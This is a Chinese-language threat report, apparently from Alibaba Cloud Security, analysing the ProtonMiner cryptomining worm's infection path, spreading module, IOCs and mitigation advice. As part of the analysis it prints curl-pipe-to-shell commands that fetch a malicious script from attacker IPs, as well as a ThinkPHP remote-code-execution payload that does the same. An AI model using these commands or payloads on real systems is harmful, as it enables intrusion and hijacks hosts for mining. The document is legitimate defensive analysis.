威脅快報|ProtonMiner挖礦蠕蟲擴大攻擊面，加速傳播

背景

近日，阿里雲安全監測到一種挖礦蠕蟲，正在互聯網上加速傳播。阿里雲安全根據它使用ProtonMail郵箱地址做爲礦池用戶名的行爲，將其命名爲ProtonMiner。據分析，這種蠕蟲與TrendMicro於2018年12月曾報導過的「利用ElasticSearch舊漏洞傳播的蠕蟲」很是類似，多是同一團伙所爲。但與先前報導不一樣的是，二月中旬，該挖礦蠕蟲擴大了攻擊面，從僅攻擊ElasticSearch這一種服務，變爲攻擊包括Redis, Weblogic在內的多種服務，傳播速度大大加快。

本文着重描寫該挖礦僵屍網絡的傳播手法，並在文末列出了安全建議，以幫助用戶避免遭受感染，或在已被感染的狀況下進行清理。

感染路徑

攻擊者先控制被感染主機執行如下兩條命令之一，從而下載並運行uuu.sh。

/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

而uuu.sh腳本運行後，將繼續下載挖礦程序和配置文件用於挖礦，以及下載蠕蟲木馬用於繼續攻擊未感染主機。

「謹慎」的入侵腳本

入侵腳本uuu.sh，首先會經過試着寫入"/etc/devtools"目錄，來判斷當前帳戶是否擁有root權限；腳本的大部分功能，只有當前帳號具備root權限時纔會運行。

#!/bin/sh

echo 1 > /etc/devtools

if [ -f "$rtdir" ]

    then

        echo "i am root"

        echo "goto 1" >> /etc/devtools

 # download & attack

fi

該腳本具備典型挖礦事件中惡意腳本的特徵：檢查並殺死其餘僵屍網絡的進程、將自身寫入系統crontab文件、修改iptables設置從而容許某些端口上的通訊等。然而這一腳本的做者或許更加謹慎：

1.在腳本最後，攻擊者清空了命令歷史記錄

2.在挖礦配置文件中，攻擊者使用了多個ProtonMail郵箱地址做爲鏈接到礦池的用戶名。ProtonMail是世界最大的安全郵件服務提供商，ProtonMiner也是所以而得名。這種使用郵箱地址，而非門羅幣錢包地址做爲礦池用戶名的作法很好地「保護」了攻擊者的隱私，也爲安全工做者們判斷該僵屍網絡的規模和收益狀況增長了難度。

傳播分析

ProtonMiner的橫向傳播程序名爲"systemctI"，是一個由Go語言編譯的程序。它的main函數以下圖所示：

該程序在運行時，會首先經過_tmp_exe_linx_ipc_Init_ip等方法對要掃描的ip和使用的弱密碼進行初始化。過程當中會請求並下載如下兩個地址的文件。

https://pixeldra.in/api/download/I9RRye (ip地址c段列表)
https://pixeldra.in/api/download/-7A5aP (弱密碼列表)

以後程序會進入main_Scan函數，該函數包含大量的掃描和漏洞利用相關子函數。

下表列出了受到該挖礦僵屍網絡影響的服務和漏洞：

例如一個ThinkPHP 的payload：

POST /index.php?s=captcha HTTP/1.1%0d%0aHost: ...%0d%0aUser-Agent: Go-http-client/1.1%0d%0aContent-Length:132%0d%0aConnection: close%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0aAccept-Encoding:gzip%0d%0a%0d%0a_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

ProtonMiner僵屍網絡擴大攻擊面以後，傳播速度有了顯著的提高。從下圖能夠看出，進入2月份以來，攻擊量快速上升，並在2月中旬達到高峯，阿里雲觀察到已有上千臺主機受到感染：

安全建議

1. 不要用root帳戶啓動數據庫、網站服務器等服務，由於root啓動的服務一旦被成功入侵，攻擊者將擁有被入侵主機的全部權限。此外，像Redis和Hadoop這些主要是內部使用的服務，不該暴露在公網上。
2. 挖礦僵屍網絡更新速度很是快，它們部分致使了互聯網上無處不在的威脅。您可使用雲防火牆服務，檢測、攔截、並保護客戶避免感染。
3. 若是你關注自身業務的網絡安全卻又僱不起一名安全工程師，那麼你能夠試試阿里雲的安全管家產品，讓阿里雲的安全專家來給你恰當的幫助，例如協助你清除已存在的病毒、木馬等。

IOC

C&C服務器:

45.76.122.92

207.148.70.143

惡意文件:

礦池地址：

xmr.pool.minergate.com:45700

使用的帳號（郵箱）名:

xjkhjjkasd@protonmail.com

dashcoin230cdd@protonmail.com

alksjewio@protonmail.com

23odi093dd@protonmail.com

olpeplckdd3@protonmail.com

參考

https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-spreads-via-old-vulnerabilities-on-elasticsearch/​​​​

 

 

原文連接 更多技術乾貨 請關注阿里云云棲社區微信號 ：yunqiinsight